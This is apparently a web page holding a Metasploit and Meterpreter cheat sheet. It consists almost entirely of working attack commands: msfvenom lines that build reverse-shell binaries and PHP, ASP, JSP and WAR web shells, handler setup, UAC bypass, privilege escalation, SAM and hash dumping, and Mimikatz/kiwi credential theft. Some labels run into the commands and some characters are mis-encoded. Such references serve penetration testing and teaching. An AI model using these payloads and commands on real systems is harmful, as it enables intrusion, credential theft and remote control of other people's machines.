๐ฎMeterpreter Cheat Sheet
Windows reverse meterpreter payload
set payload windows/meterpreter/reverse_tcpWindows reverse tcp payload
Windows VNC Meterpreter payload
set payload windows/vncinject/reverse_tcpMeterpreter Windows VNC Payload
set ViewOnly false
Linux Reverse Meterpreter payload
set payload linux/meterpreter/reverse_tcpMeterpreter Linux Reverse Payload
Meterpreter Cheat Sheet
upload file c:\\windowsMeterpreter upload file to Windows target
download c:\\windows\\repair\\sam /tmpMeterpreter download file from Windows target
download c:\\windows\\repair\\sam /tmpMeterpreter download file from Windows target
execute -f c:\\windows\temp\exploit.exeMeterpreter run .exe on target โ handy for executing uploaded exploits
execute -f cmd -cCreates new channel with cmd shell
psMeterpreter show processes
shellMeterpreter get shell on the target
getsystemMeterpreter attempts priviledge escalation the target
hashdumpMeterpreter attempts to dump the hashes on the target (must have privileges; try migrating to winlogon.exe if possible first)
portfwd add โl 3389 โp 3389 โr targetMeterpreter create port forward to target machine
portfwd delete โl 3389 โp 3389 โr targetMeterpreter delete port forward
use exploit/windows/local/bypassuacBypass UAC on Windows 7 + Set target + arch, x86/64
use auxiliary/scanner/http/dir_scannerMetasploit HTTP directory scanner
use auxiliary/scanner/http/jboss_vulnscanMetasploit JBOSS vulnerability scanner
use auxiliary/scanner/mssql/mssql_loginMetasploit MSSQL Credential Scanner
use auxiliary/scanner/mysql/mysql_versionMetasploit MSSQL Version Scanner
use auxiliary/scanner/oracle/oracle_loginMetasploit Oracle Login Module
use exploit/multi/script/web_deliveryMetasploit powershell payload delivery module
post/windows/manage/powershell/exec_powershellMetasploit upload and run powershell script through a session
use exploit/multi/http/jboss_maindeployerMetasploit JBOSS deploy
use exploit/windows/mssql/mssql_payloadMetasploit MSSQL payload
run post/windows/gather/win_privsMetasploit show privileges of current user
use post/windows/gather/credentials/gppMetasploit grab GPP saved passwords
load kiwicreds_allMetasploit load Mimikatz/kiwi and get creds
run post/windows/gather/local_admin_search_enumIdenitfy other machines that the supplied domain user has administrative access to
set AUTORUNSCRIPT post/windows/manage/migrate
Meterpreter Payloads
msfvenom โlList options
Binaries
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elfmsfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exemsfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
Web Payloads
msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.phpPHP
set payload php/meterpreter/reverse_tcp ย ย ย ย ยListener
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.phpPHP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.aspASP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jspJSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.warWAR
Scripting Payloads
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.pyPython
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.shBash
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.plPerl
Shellcode
For all shellcode see โmsfvenom โhelp-formatsโ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -fmsfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -fmsfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f
Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
exploit/multi/handler set PAYLOAD set LHOST set LPORT set ExitOnSession false exploit -j -zAn example is:
msfvenom exploit/multi/handler -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f > exploit.extensionLast updated
Was this helpful?